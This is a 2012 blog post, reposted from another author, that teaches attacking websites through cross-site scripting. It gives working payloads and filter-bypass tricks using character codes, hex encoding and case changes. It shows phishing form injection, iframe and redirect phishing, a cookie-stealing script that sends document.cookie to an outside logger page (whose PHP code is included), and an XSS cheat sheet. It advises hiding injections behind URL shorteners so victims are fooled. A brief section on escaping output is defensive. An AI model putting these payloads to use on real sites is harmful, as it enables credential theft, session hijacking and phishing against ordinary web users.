Wednesday, 22 February 2012

How To Hack Using Advanced XSS

What exactly is XSS ?

XSS" is a short form for: "Cross Site Scripting" as you can see by the name , XSSdeals with scripting. To be more exact: Javascript. It's about injecting (almost) every Javascript (and html/css) command/script in a website.XSS flaws comes up every time a website doesn't filter the attackers input. In other words: the attacker can inject his malicious script into a website, and the browser just run's the code or script.

 There are 3 types of XSS, I'm going to talk about the 2 most used:

$ Reflected XSS Attack:
$ When a attacker inject his malicious script into a searchquery, a searchbox,
$ or the end of an url, it's called Reflected XSS Attack. It's like throwing a ball
$ against a wall and receive him back.

$ tored XSS Attack:
$ Is when an injected XSS script is stored permanent on a website, for example in
$ a guestbook or bulletin board. Stored XSS hit's everyone who just reaches the
$ site with the malicious code.

$ DOM based XSS:
$ This is a rare used method, perhaps I'm going to write another Whitepaper about
$ DOM based XSS attack.

How to execute XSS commands

Actually, injecting a XSS script is very easy. To check if the target website is vulnerable, just look out for a searchbox or something.Let's say this is how a simple, unsecured search function looks like:

content of index.html 

<html>
 <head>
 <title>Google</title>
 </head>
  <body>

   <form method="get" action="search.php">
   Google:
   <input type="text" name="search" size="20" />
   <input type="submit" class="button" value="Submit" />
   </form>

 </body>
</html>

content of google.php

<?php echo $_GET['search']; ?>

# I'm going to use this script as an example for the rest of this paper #

Let's say this script is stored on a webspace, when I type in:
 123
 then it leads me to the url:

  http://site.ru/google.php?search=123

 and shows me

  123

 But now, let's try to inject a simple javascript alert message :

  <script>alert("cyberkey");</script>

 and send it.
 You can replace "turtles" with any other word you want, and even use ' ' instead
 of " " for example:

  <script>alert('cyberkey');</script>

 But I'm keep using "turtles" as example for the rest of this paper.
 The target website let's us know if it's vulnerable when it prints a popup containing

 |=========|    |======|
 | turtles | or | 1234 |
 |=========|    |======|

 Instead of the called code, we can even inject every simple html tags e.g.:

  <h1><font color="#00FF00">I like cyber key</font></h1>

 and send it.
 Also, you can paste the code at the end of the url, and visit the site like:

  www.site.ru/google.php?search=<script>alert('cyberkey');</script>

 or

  www.site.ru/google.php?search=<h1><font color="#00FF00">I like cyber k</font></h1>

# It's like the attacker is determining the content of the website. #

 But even if this doesn't work, there's no reason to worry: that means the website
 uses filter techniques to avoid XSS flaws. But there are also ways to
 bypass those filters. How this works, you're going to read in the next chapter.

Bypass techniques
   
  There are a lot of ways to bypass XSS filters on websites, I'll number some:

 1.) magic_quotes_gpc=ON bypass
 2.) HEX encoding
 3.) Obfuscation
 4.) Trying around

 1.) magic_quotes_gpc=ON is a php setting (php.ini).
    It causes that every ' (single-quote), " (double quote) and  \ (backslash)
     are escaped with a backslash automatically. It's also a well known method
     to avoid XSS flaws, although it's exploitable.
 
 How to bypass it when it's ON? - use the javascript function called
 String.fromCharCode(), just convert your text in decimal characters
 (e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the handling.

 Using "turtles" (without quote sign) will look like this:
 
  String.fromCharCode(116, 117, 114, 116, 108, 101, 115)
 
 now insert this in your alert script:

  www.site.ru/google.php?search=<script>alert(String.fromCharCode(116, 117, 114, 116, 108, 101, 115));</script>

  2.) HEX encoding is a useful bypass method, too. Using this step will encode
      your script, so you can't see clearly on the first look what the code will cause.
      This is how

  <script>alert(/turtles/);</script>

 looks like encrypted in HEX:

  www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E

 3.) Obfuscation - sometimes website administrator simply put words like
     "script","alert()","''" on the "badwords list", that means, when you
     search for "script" on the website, it just shows you an error, like
     "you are not allowed to search for this word" or something.
     but this is a weak protection, you can bypass it using obfuscation.
     your javascript code like:

  <sCrIpT>alert('turtles');</ScRiPt>

     There are like unlimited possibilities, but that leads us to the
     next chapter...

 4.) Trying around: sometimes you just got to try around, because every website
     is secured/unsecured in a different, unique way. Some doesn't even use
     cookies for example. Alway's keep a look at the website's source code!
     Sometimes you need to adjust your XSS script, like:

  "><script>alert(/turtles/);</script>

 This you need sometimes if you injected your code into a searchbox e.g. and
 interrupt a html tag, so you first need to close him, then start a new
 tag (<script>...).

 Anyway, there are lot's of different methods how to bypass XSS filtration,
 try around !


What can we do with XSS ?
                  
 Til now I showed you how to spawn a javascript alert message on a website.
 But now I'll show you how harmful such a XSS flaw can be for your website. Here are
 some attack techniques you can do with a XSS flaw:

 1.) Inject a Phishing script
 2.) Iframe Phishing
 3.) Redirict Phishing
 4.) Cookie stealing

 1.) Phishing script inject: Just inject a 'user' and 'password' field in html
     (With the <html> and <body> tags), that the victim may think he need's
     to login to the target site.

 Here an example:

  www.site.ru/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
  <div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.ru/phishingscript.php">
  Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br /> 
  <input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
  <br /></form></div></body></html>

content of phishingscript.php

<?php
login = $_POST['user'];
password = $_POST['Password'];
open = fopen('log.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>

 2.) Iframe Phishing: Simple thing, just inject a javascript code containing an
     iframe where your phishing site is embeeded.
     Obviously it needs to look just like the target site.

 Here an example:

  www.site.ru/google.php?search=<iframe src="http://www.yourphishingsite.ru" height="100%" width="100%"></iframe>

 (Note: height="100%" width="100%" means that the whole window is filled with  that iframe.)
 The target site will spawn your phishing site in an Iframe, and the website user / victims won't see a
 difference and log in (If they're are foolish enough).

 3.) Rediriction Phishing: Also simple, just inject a javascript rediriction
     script that leads to your phishingsite, of course it needs to look just
     like the target site.

 Here an example:

  www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>

 or

  www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0; URL="http://www.yorphishingsite.ru">

 4.) Cookie stealing: One of the feared things in XSS flaws is the cookie stealing
     attack. In this method you need to do following:

     Place this cookiestealer.php in your hoster, and then inject a javascript
     with your cookie stealer script embedded on your target website.
 
content of cookiestealer.php (found it somewhere with google)

<?php
cookie = $HTTP_GET_VARS["cookie"];
file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
fclose($file);
?>

 Save it as cookiestealer.php and create a 'log.txt' and upload both files
 on your own webspace, in the same directory and set "chmod 777".

 Inject the following code in your target website:

  http://www.site.ru/google.php?search=<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>

 Then the victim's cookie (target's website user who visited the url above) should
 appear in the log.txt.
 Now you simply need to insert the cookie (with e.g. live http headers firefox addon)
 and use it.

 Obviously you need to replace

  http://www.yourphishingsite.ru

 With the url of your phishingsite.

# PROTIP: rename your 'cookiestealer.php' to something like 'turtles.php', #
# this looks less suspicous.

How to fix XSS leakages
 
  XSS flaws can be very dangerous for your website, even though you can easily  secure your own website using the following functions.

##########################################################
#                                                        #
# htmlspecialchars()                                     #
# http://php.net/manual/de/function.htmlspecialchars.php #
#                                                        #
##########################################################

Example usage:

google.php:

<?php echo htmlspecialchars($_GET['search']); ?>

$ OR

##########################################################
#                                                        #
# htmlentities()                                         #
# http://php.net/manual/de/function.htmlentities.php     #
#                                                        #
##########################################################

Example usage:

google.php:

<?php echo htmlentities($_GET['search']); ?>

 What happened? - the function simply replaced every specialchar to a harmless html char.
 For example when I enter

<script>alert("turtles");</script>

 it appears

<script>alert("turtles");</script>

 But without any popup, because the <,>,',"
 turned into <,>,',"
 The attackers input has become a harmless, unexecutable html code.



Cheat Sheets


 Here is the XSS cheat sheet, where I got most of them from http://ha.ckers.org/xss.html.
 Enjoy.

'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC="jav    ascript:alert('XSS');">

<IMG SRC="jav    ascript:alert('XSS');">

<IMG SRC="jav
ascript:alert('XSS');">

#############################################################
#                                                           
# PROTIP FOR EVERY XSS INJECTION:                          
# use url shortener services such as tinyurl.com or bit.ly  
# to 'hide' your injection, so the victim won't know what's 
# behind that url.                                          #
#                                                           ##############################################################

END OF POST


This post is not written by me.. 

0 comments: